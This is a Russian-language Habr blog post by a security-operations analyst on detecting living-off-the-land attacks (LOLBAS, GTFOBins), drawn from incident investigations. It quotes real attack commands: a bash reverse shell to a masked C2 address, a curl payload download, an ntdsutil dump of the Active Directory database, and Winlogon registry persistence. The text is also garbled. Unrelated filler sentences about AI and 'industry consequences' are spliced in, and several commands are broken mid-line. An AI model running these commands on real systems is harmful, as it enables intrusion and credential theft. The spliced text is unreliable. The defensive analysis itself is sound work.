«Легитимное зло» в инфраструктуре: практический опыт детектирования LOLBAS

В сфере искусственного интеллекта произошло заметное событие. CSIRT 8 минут назад «Легитимное зло» в инфраструктуре: практический опыт детектирования LOLBAS Средний 7 мин 409 Блог компании Инфосистемы Джет Информационная безопасность * Кейс Привет, Хабр! Меня зовут Максим Кишмерешкин, я ведущий аналитик центра мониторинга и реагирования «Инфосистемы Джет». Сегодня мы поговорим про довольно старую, но до сих пор остающуюся популярной тему — LOTL.

Напомню, что LOTL (living on the land), или как я его называю «жизнь на подножном корме» — это использование в атаке инструментов, которые уже есть в системе жертвы. Мы поделимся тем, как мы этот класс атак встречали в реальных кейсах, какие процедуры и техники выявляли, и расскажем, как их можно детектировать. Использование LOTL в атаках, в отличие от ВПО (как типового, так и разработанного под конкретную задачу), даёт злоумышленникам ряд неоспоримых преимуществ: отличительной особенностью я бы назвал отсутствие индикаторов компрометации при выявлении подобного рода атак, эти атаки все еще тяжело детектировать средствами EDR, антивирусов, а также очень часто эту активность можно спутать с легитимной административной деятельностью.

Технические детали

За последние два года мы видели следы использования LOTL на разных этапах атак во всех своих расследованиях. Концепция LOTL популярна, развивается в lolol. farm и уже насчитывает около 28 отдельных проектов, которые полезны как атакующим для конструирования своих атак, так и защищающимся, чтобы писать детектирующие правила.

Полезные проекты для защитников — это основные проекты LOLBAS (легитимные утилиты Windows и аргументы выполнения к ним, с помощью которых можно выполнять злонамеренные действия), GTFObins — аналог под linux, LOLtunnels, loldrivers. Не только мы замечали, что злоумышленники используют LOLBAS в своих атаках. Например, публично известны следующие варианты атак с LOTL: APT31 горизонтально перемещалась через WMI wmic process call create malware.

exe/ , Goffee через mshta доставляли и выполняли полезную нагрузку powershell. exe Team дампили базу ntds. dit используя ntdsutil.

Отраслевые последствия

ntdsutil "ac i ntds" ifm "create full nodefrag $appdata\AD" q qДавайте на примерах реальных кейсов из наших расследований посмотрим, какими процедурами LOLBAS, GTFOBins пользовались злоумышленники. Как это выглядит в реальных инцидентахАбсолютно типичная сегодня ситуация для наших расследований:В linux-системах была выявлена загрузка и исполнение вредоносного скрипта с C2-сервера с использованием стандартных системных утилит bash и curl:bash -i >& /dev/tcp/xx. xx/8080 0>&1 bash -i >& /dev/tcp/xx.

xx/53 0>&1 curl -o /tmp/systemdВ другом примере, уже под Windows, злоумышленники закреплялись через процесс reg. exe при каждом старте системы, запуская свое ВПО zip. bat вместе с запуском explorer.

exe:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d explorer.

Этот прогресс даёт важные сигналы о будущем отрасли, и технологический мир внимательно наблюдает.